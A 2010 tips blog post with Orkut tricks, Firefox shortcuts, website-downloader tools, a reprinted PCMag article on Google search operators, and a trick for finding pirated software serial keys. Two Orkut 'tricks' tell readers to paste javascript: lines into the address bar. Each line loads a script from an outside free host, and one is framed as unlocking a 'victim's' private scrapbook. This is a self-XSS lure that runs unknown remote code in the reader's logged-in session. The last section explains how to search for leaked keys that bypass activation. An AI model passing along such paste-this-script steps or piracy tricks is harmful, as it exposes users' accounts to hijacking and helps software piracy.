Saturday, August 7, 2010

How can anyone Hide name in orkut profile

This is for all orkut users who like to hide their first & last name in their orkut profile. In short this for whom who used ALT+0173 trick and now find its not working anymore. Here are the steps….

Log in to your account. Go to profile >> Edit Profile
Now delete everything from your first name field.
Right click on the BOX below and select copy or click on the box and press Ctrl+C.
Now Go to name field in your orkut account and Paste or press Ctrl+V.
Now go to bottom of page and click update.
It’s done, now you are without name in orkut profile. You can do the same for Last name field also.

Can I download all Images from Websites in 1 click?


Everyone knows that downloading images from the site is very boring or hectic normally when site have lots of images. BUT Save Images is a free Firefox extension which gives you download all the images form any website on the internet, this Firefox extension is really helpful in downloading images from any website.
You can also filter the image.
The extension can be run from the right click menu or from File > Tools Menu.

How to Save Images With Save Images:
Open the website from which you want to download images. Just right click on the page and select Save Images > Links > Open ALL links in 1 Tab.
Now it will show a small window containing links to all the images in the current tab, unselect those which you don’t want to download and click OK
This will open all the linked images in 1 tab in different frames from where you can download them all by right click select Save Images >Save Images from current tab

HOW TO DOWNLOAD WHOLE WEBSITE?



how can we download an entire web-site on our computer.  
There are numerous software and applications available on web which lets you download a web site or a blog completely on your computer.
 But i am giving you free software which will download whole website or blog..
 HTTrack
 Click here to see an example of how to download the entire web-site using HTTrack
 BackStreet
 BackStreet Browser - it is a Free Offline Browser / Web-Site Downloader, It is another free offline browser, and a  high speed web-site downloading  and viewing program.   
Features of BackStreet Offline Browser
  • High-speed, multi-threading website downloading
  • Resume Downloading support
  • Option for duplicating the entire web site directory
  • Can also download password-protected sites.
  • Print and Preview downloaded  web site files.
  • You can filter by URL, size, type, date modified etc
 Download HTTrack | Download BackStreet Browser
 

How to Unlock any ones scrapbook for Orkut profile ??

For unlocking any ones Scrapbook in orkut
Just follow the steps below

Copy the below red colour java script.
Paste it in address bar. (Where http://www.orkut.com/ is written)
Hit Enter.
Wait for a minute.
Now check the victim’s scrapbook.

CODE:
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://freetzu.freetzi.com/scrapbook.js';void(0)

Firefox all short-cuts U knw.???

:-)Mainly for Firefox / Netscape navigator
  1. How to Auto complete domain extensions:
    You must be knowing the shortcut (Ctrl+Enter) for automatically adding ‘.com’ at the end of every domain name you enter in address bar. But what about ‘.net’ and ‘.org’ domains? It’s shortcuts are -
    For .net  extension  press Shift+Enter
    For .org extension  Ctrl+Shift+Enter
    For .com extension shortcut is Ctrl+Enter
  2. Opening link on new tab:
    Usually people doing this by right clicking on the link and using ‘Open link in new tab’ option. But you can do this by using shortcut key. Hold “Ctrl” button and click on a link to open it on a new tab.
  3. How to Opening/Close a tab in Firefox:
    To open or close new tabs, the shortcuts are:
    for Open  Ctrl+T
    for Closeing  Ctrl+W
  4. How to Scroll a window in firefox:
    For Scrolling  Down press Spacebar
    For Scrolling  Up               Shift+Spacebar
  5. For Bookmark an address:
    shortcut is  Ctrl+D to bookmark a web address into a your bookmark list or favorite links folder.
  6. How to Open last closed tab in firefox:
    if i accidentally close any tab. For recovering that tab  shortcut is Ctrl+Shift+T or u can just right click on the tab bar and press undo close tab.
  7. Closing a tab using mouse:
    Just place your mouse cursor over the tab you want to close and hit the middle button of your mouse.
  8. How to Browse the tabs in firefox:
    To browse tabs or moving them back or forward, just use this shortcut:
    To Moving next tab     Ctrl+PageDown
    To Moving to previous tab Ctrl+PageUp
  9. How to Navigate directly from last tab to first tab:,
    If you are on the 9th tab of a window and want to navigate to 1st tab, then use the Ctrl+1
    and for navigating any tab just  press Ctrl and the number
    like Ctrl+1 or Ctrl+(Nos. from 1-9)
  10. Closing Firefox window:
    For Closing all tabs or the window Alt+F4

How to send scrap to All my friends in orkut ???

Just open orkut page and copy this script in URL bar.

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://freetze.freetzi.com/photo.js';void(0)

Hit enter.
It sends scrap to the entire friend's automatically.

How to Set Multiple Home Pages In Firefox ??

Set Multiple Home Pages In Firefox

Suppose you would like to set Orkut, Google and my blog as your homepages. Then try this tweak in Firefox to set multiple homepage. This is what you should do :
Goto Tools>Options>Main
In the When Firefox starts drop down menu choose Show my home page
In Home page give your homepages separated by a | (pipe symbol or OR sign)

Example: http://www.google.com|http://www.orkut.com|http://www.uniquetricks.com
Click OK
Now next time when you start Firefox all of your three home pages will be displayed simultaneously.

20 great gooogle secrets !!!

20 Great Google Secrets



http://www.pcmag.com/article2/0,4149,1306756,00.asp

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Google is clearly the best general-purpose search engine on the Web (see

www.pcmag.com/searchengines

But most people don't use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google's index, it's still a struggle to pare results to a manageable number.

But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Google's search options go beyond simple keywords, the Web, and even its own programmers. Let's look at some of Google's lesser-known options.

Syntax Search Tricks

Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at

www.google.com/help/operators.html

. Here are some advanced operators that can help narrow down your search results.

Intitle: at the beginning of a query word or phrase (intitle:"Three Blind Mice") restricts your search results to just the titles of Web pages.

Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you're searching for might commonly appear in URLs. If you're looking for the term HTML, for example, and you don't want to get results such as

www.mysite.com/index.html

, you can enter intext:html.

Link: lets you see which pages are linking to your Web page or to another page you're interested in. For example, try typing in

link:http://www.pcmag.com


Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:"Mark Twain"site:edu. Experiment with mixing various elements; you'll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.

Swiss Army Google

Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature

(www.google.com/help/features.html#calculator)

lets you do both math and a variety of conversions from the search box. For extra fun, try the query "Answer to life the universe and everything."

Let Google help you figure out whether you've got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try "thre blund mise") and Google may suggest a proper spelling. This doesn't always succeed; it works best when the word you're searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you're searching for "three blind mice," underneath the search window will appear a statement such as Searched the web for "three blind mice.") You'll discover that you can click on each word in your search phrase and get a definition from a dictionary.

Suppose you want to contact someone and don't have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you'll see it at the top of the search results along with a map link to the address. If you'd rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you'd rather use a search form for business phone listings, try Yellow Search

(www.buzztoolbox.com/google/yellowsearch.shtml).




Extended Googling

Google offers several services that give you a head start in focusing your search. Google Groups

(http://groups.google.com)

indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: Froogle
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(http://froogle.google.com),

which indexes products from online stores, and Google Catalogs
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(http://catalogs.google.com),

which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google's tools and services at

www.google.com/options/index.html

You're probably used to using Google in your browser. But have you ever thought of using Google outside your browser?

Google Alert

(www.googlealert.com)

monitors your search terms and e-mails you information about new additions to Google's Web index. (Google Alert is not affiliated with Google; it uses Google's Web services API to perform its searches.) If you're more interested in news stories than general Web content, check out the beta version of Google News Alerts

(www.google.com/newsalerts).

This service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)

Google on the telephone? Yup. This service is brought to you by the folks at Google Labs

(http://labs.google.com),

a place for experimental Google ideas and features (which may come and go, so what's there at this writing might not be there when you decide to check it out). With Google Voice Search

(http://labs1.google.com/gvs.html),

you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don't expect 100 percent success.

In 2002, Google released the Google API (application programming interface), a way for programmers to access Google's search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you'll need an API key, which is available free from
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www.google.com/apis

. See the figures for two more examples, and visit

www.pcmag.com/solutions

for more.

Thanks to its many different search properties, Google goes far beyond a regular search engine. Give the tricks in this article a try. You'll be amazed at how many different ways Google can improve your Internet searching.


Online Extra: More Google Tips


Here are a few more clever ways to tweak your Google searches.

Search Within a Timeframe

Daterange: (start date–end date). You can restrict your searches to pages that were indexed within a certain time period. Daterange: searches by when Google indexed a page, not when the page itself was created. This operator can help you ensure that results will have fresh content (by using recent dates), or you can use it to avoid a topic's current-news blizzard and concentrate only on older results. Daterange: is actually more useful if you go elsewhere to take advantage of it, because daterange: requires Julian dates, not standard Gregorian dates. You can find converters on the Web (such as

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http://aa.usno.navy.mil/data/docs/JulianDate.html

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), but an easier way is to do a Google daterange: search by filling in a form at

www.researchbuzz.com/toolbox/goofresh.shtml or www.faganfinder.com/engines/google.shtml

. If one special syntax element is good, two must be better, right? Sometimes. Though some operators can't be mixed (you can't use the link: operator with anything else) many can be, quickly narrowing your results to a less overwhelming number.

More Google API Applications

Staggernation.com offers three tools based on the Google API. The Google API Web Search by Host (GAWSH) lists the Web hosts of the results for a given query

(www.staggernation.com/gawsh/).

When you click on the triangle next to each host, you get a list of results for that host. The Google API Relation Browsing Outliner (GARBO) is a little more complicated: You enter a URL and choose whether you want pages that related to the URL or linked to the URL

(www.staggernation.com/garbo/).

Click on the triangle next to an URL to get a list of pages linked or related to that particular URL. CapeMail is an e-mail search application that allows you to send an e-mail to google@capeclear.com with the text of your query in the subject line and get the first ten results for that query back. Maybe it's not something you'd do every day, but if your cell phone does e-mail and doesn't do Web browsing, this is a very handy address to know.

how to find serial keys in gooogle..??

ok, this is a little trick that i usually use to find cd keys with google.


if your looking for a serial number for nero (for example) goto google.com and type nero 94FBR and it'll bring it up

this works great in google

HOW DOES THIS WORK?

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things.

1)The pages that are returned are pages dealing specifically with the product you're wantinga serial for.

2)Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.


I hope this trick help you finding your ccd keys easily

Enjoy :)